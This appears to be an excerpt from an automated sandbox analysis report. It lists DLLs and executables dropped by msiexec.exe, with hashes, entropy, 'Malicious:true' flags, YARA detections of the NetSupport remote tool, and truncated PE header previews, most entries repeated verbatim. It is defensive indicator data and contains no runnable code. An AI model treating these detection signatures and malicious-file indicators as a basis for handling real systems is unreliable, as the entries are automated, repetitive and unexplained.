                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI21BF.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI21DF.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):523512
                                                                                                                    Entropy (8bit):6.417003633431126
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:0YyHpqomwGyh0OWYZKStlPGQvpOtC5bOPzf4tN:0YyCwGY0OtZKSvGkpOtC5Q4b
                                                                                                                    MD5:D524B639A3A088155981B9B4EFA55631
                                                                                                                    SHA1:39D8EEA673C02C1522B110829B93D61310555B98
                                                                                                                    SHA-256:03D91C8CD20B846625A092A3DAE6A12369930C65D6216A455A00449EBB0DC289
                                                                                                                    SHA-512:84F8AB54122F93A40DA08FD83BCA767AB49EB0F73C4AB274D9BDA11DD09224134DF011FA02E5A3ABBAFCC6FBEF6A60673DD48FEABDF829A1E22C85A2A759B7AC
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......b.o.&o..&o..&o....+o....Bo.....o../...-o..&o..\o......o.....'o.....'o..&o..'o.....'o..Rich&o..................PE..L.....Y...........!.....V..................p...............................0.......s....@..........................(..rB......x................................d...r..8...............................@............p...............................text...#T.......V.................. ..`.rdata..R....p.......Z..............@..@.data...|4...p.......V..............@....rsrc................l..............@..@.reloc..Ne.......f...z..............@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI222E.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI222E.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI23B6.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI23B6.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI23F5.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI23F5.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI2435.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2435.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI2465.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2465.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI2485.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2485.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI24C5.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI24C5.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI2504.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2504.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI25E0.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI25E0.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI2610.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI2610.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI264F.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):763872
                                                                                                                    Entropy (8bit):6.574853256300612
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:UwBfoW/SGOLyn5PmPgLmkgM2uyIXEFH9YI/WIvSGvmm5s3qGGaG6rn5ax77/v10E:F6IqkgM2uyIqH93/WIvOqMR/YfMl2eTS
                                                                                                                    MD5:0FCF65C63E08E77732224B2D5D959F13
                                                                                                                    SHA1:5419B79FE14E21D1D5B51FE8187F7B86EC20DE74
                                                                                                                    SHA-256:F3E587F94A79C46A603B39286E93B17FABC895C6B71B26B0FC5D812CF155B7E5
                                                                                                                    SHA-512:7C289AAF3AC1B998C8CA9593A58C8AA3A9AA9F41852C1ED4192B908E0AD51871400D585B4FE508D49368BDFC7378807D289971914870A7A47B0410A946E5E381
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI264F.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........)..H.H.H.3.l..H..>j..H.0w..H.0g..H.H..>I..>^..H..>_..H..>o..H..>n..H..>i..H.Rich.H.................PE..L.....oe.................t........................@..........................0............@..........................c.......@..,....P..(Y...........J...]......Lo.. ...................................@...............\....=..@....................text....s.......t.................. ..`.rdata..t............x..............@..@.data...@....p...0...N..............@....rsrc...(Y...P...Z...~..............@..@.reloc...p.......r..................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI291F.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
                                                                                                                    SHA-512:F993E4E04B348F7EB346D2F3D00FDAED2212F28BA885BBE50C1959737C5B6CAB9CFBE17C4ABA992521AA0ECDCF5216FA9E6C36A47746077307D32170223A9A97
                                                                                                                    Malicious:true
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI291F.tmp, Author: Joe Security
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rdata.......0... ..."..............@..@.data....f...P..."...B..............@....rsrc...............d..............@..@.reloc..x?...`...@..................@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI294F.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:data
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):4973337
                                                                                                                    Entropy (8bit):6.519265869086554
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:98304:KgAesgAelgAeHcqMOfhR2cqMOfERhgAeAcqMOf3:KOsOlOE4hn4E/O/43
                                                                                                                    MD5:E5D8B0B632DB7008A4E150523EAB7EF3
                                                                                                                    SHA1:C70BD838087CA59A944749D35B8E2544D3EA9569
                                                                                                                    SHA-256:37918BEB4108451977C8F97E3F79F28FE10176F925CEAA4407F0C795CC301F57
                                                                                                                    SHA-512:EE17EDDCDB64D4C8767FC8E2D646AFDC505F5AD8A28F28B9CB2F3813B0D89655F898B56C717DD490684DA0F3F6A3611D0AE768806974E76C7A5CCF1609CB4E21
                                                                                                                    Malicious:false
                                                                                                                    Yara Hits:
                                                                                                                    • Rule: JoeSecurity_NetSupport, Description: Yara detected NetSupport remote tool, Source: C:\Windows\Installer\MSI294F.tmp, Author: Joe Security
                                                                                                                    Preview:...@IXOS.@.....@.vY.@.....@.....@.....@.....@.....@......&.{CBB68368-7767-4CFF-B3E5-211488346702}..NetSupport Manager..vrep.msi.@.....@.....@.....@......ARPPRODUCTICON.exe..&.{8FA17BDF-C6BA-4483-AA65-62957D834D73}.....@.....@.....@.....@.......@.....@.....@.......@......NetSupport Manager......Rollback..Rolling back action:..[1]..RollbackCleanup..Removing backup files..File: [1]...@.......@........StopDrivers....J...StopDrivers.@A.........MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.-.5.CV5.CV5.CV...V6.CV...V,.CVZ..V1.CV<..V7.CV<..V$.CV5.BV.CV...V..CV...Vf.CV...V4.CV...V4.CV...V4.CVRich5.CV........................PE..L....KXf...........!................6........0............................................@..........................I.......4......................@...]...`..P>...3..................................@............0...............................text............................... ..`.rda

                                                                                                                    C:\Windows\Installer\MSI29BD.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):250616
                                                                                                                    Entropy (8bit):6.25532114530443
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:6144:JW17KIRjMhp0/dy1uKS8CEZv41XYZlhIz:hIRghpmE1uKS8NyVYZlhIz
                                                                                                                    MD5:C4CA339BC85AAE8999E4B101556239DD
                                                                                                                    SHA1:D090FC385E0002E35DB276960A360C67C4FC85CD
                                                                                                                    SHA-256:4AB23609CDC64D10B97C9CCB285ED7100F55D54D983CD50762DA25ECAC4357F9
                                                                                                                    SHA-512:9185EC32545FC838D7FEF6C9E4DD222DD02114C661B0B344F16287D55E6571BFE7A4233A852ACC579D07BCDBAB18C5C034C465B1F4BB78535ED51C3499087FE0
                                                                                                                    Malicious:true
                                                                                                                    Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........|.../.../.../n$./.../=%./.../n$./.../n$./.../..L/.../..\/.../.../.../=%./.../=%./.../=%./.../..X/.../=%./.../Rich.../................PE..L.....Y...........!.....\...x......V........p.......................................H..............................PK......,=......................................................................`...@............p...............................text...MZ.......\.................. ..`.rdata.......p.......`..............@..@.data...4:...P.......>..............@....rsrc................X..............@..@.reloc...V.......X...^..............@..B................................................................................................................................................................................................................................................................................................

                                                                                                                    C:\Windows\Installer\MSI2B06.tmp

                                                                                                                    Download File
                                                                                                                    Process:C:\Windows\System32\msiexec.exe
                                                                                                                    File Type:PE32 executable (DLL) (console) Intel 80386, for MS Windows
                                                                                                                    Category:dropped
                                                                                                                    Size (bytes):499168
                                                                                                                    Entropy (8bit):6.471749736248109
                                                                                                                    Encrypted:false
                                                                                                                    SSDEEP:12288:DhTteuLgZ4ehKraHZt1bNUEc19T7Bn8C+YX/m/HimfRC9mlSa8XJt8U:8tN8+gEBRC8lSa8J
                                                                                                                    MD5:3085D62326CC1AE4AB21489576973621
                                                                                                                    SHA1:E3C847DEE0ECC7176C1168D6D1DF9B9E98B19936
                                                                                                                    SHA-256:D2DC425F47D8C80ABD8CADBCD8AA53516E7754C371BD3BAD3907294A6CA57C5C
